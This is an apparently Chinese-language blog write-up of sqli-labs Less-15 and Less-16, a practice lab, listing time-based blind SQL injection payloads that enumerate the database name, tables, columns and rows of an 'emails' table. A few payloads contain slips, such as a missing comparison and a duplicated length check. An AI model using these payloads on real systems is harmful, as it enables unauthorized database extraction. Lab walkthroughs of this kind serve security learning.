zoukankan      html  css  js  c++  java
  • sqli-labs less-15 --> less-16

    Less-15(布尔/时间盲注)

    1.判断是否存在注入点

    无论是输入admin/admin’/admin” 都显示回显正常,于是执行uname=admin' and sleep(5)#&passwd=&submit=Submit,发现延时回显,首先判断存在注入点,注入方式为:’’

    2.爆库

    爆库长:uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit

                         判断的数据库字符长度为8

    爆库名:uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

          判断数据库名字的第一个字符

    3.爆表

    爆第一个表长:uname=admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(3),1)#&passwd=&submit=Submit

    爆第一个表名:admin' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#

    4.爆字段

    爆第一个字段的长度:admin' and if(length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#

    爆第一个字段名:admin' and if(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#

    5.爆数据

    爆第一个数据的长度:admin' and if(length((select id from emails limit 0,1))=1,sleep(3),1)#

    爆第一个数据:admin' and if(substr((select id from emails limit 0,1),1,1)=1,sleep(3),1)#

    -------------------------------------------------------END----------------------------------------------------------------

    Less-16 (布尔/时间盲注)

    1.判断是否存在注入点

       执行uname=admin" and sleep(3)#&passwd=&submit=Submit或者uname=admin’ and sleep(3)#&passwd=&submit=Submit后均无反应,于是尝试执行uname=admin") and sleep(3)#&passwd=&submit=Submit,页面发生延迟,判断存在注入点

    2.爆库

       爆库长:uname=admin") and if (length(database())=8,sleep(3),1)#&passwd=&submit=Submit

          判断数据库的长度是8

       爆库名:uname=admin") and if (substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit

          判断数据库名字的第一个字母是什么

      以此类推,得到数据库名为’security’

    3.爆表

       爆第一个表长:uname=admin") and if (length((select table_name from information_schema.tables where table_schema='security' limit 0,1)),sleep(3),1)#&passwd=&submit=Submit

       爆第一个表名:uname=admin") and if (substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)#&passwd=&submit=Submit

    4.爆字段

       爆第一个字段长:uname=admin") and if (length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2,sleep(3),1)#&passwd=&submit=Submit

       爆第一个字段名:uname=admin") and if (substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)='i',sleep(3),1)#&passwd=&submit=Submit

    5.爆数据

       爆第一个数据长:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

       爆第一个数据:uname=admin") and if (length((select id from emails limit 0,1))=1,sleep(3),1)#&passwd=&submit=Submit

    -------------------------------------------------------END----------------------------------------------------------------

  • 相关阅读:
    Linux Shell 文本处理工具集锦--Awk―sed―cut(row-based, column-based),find、grep、xargs、sort、uniq、tr、cut、paste、wc
    ACME[free https] Linux中使用curl命令访问https站点4种常见错误和解决方法
    php composer,update-ca-trust
    bootloader,kernel,initrc
    linux devcie lspci,lscpu,blkdiscard,fstrim,parted,partprobe,smartctl
    剖析Docker文件系统:Aufs与Devicemapper
    Linux 内核中的 Device Mapper 机制
    MapReduce报错:Error: java.io.IOException: Initialization of all the collectors failed. Error in last collector was :interface javax.xml.soap.Text
    hadoop运行报错Wrong FS: hdfs:/, expected: file:///
    Hadoop 伪分布式上安装 Hive
  • 原文地址:https://www.cnblogs.com/B-roin/p/12330690.html
Copyright © 2011-2022 走看看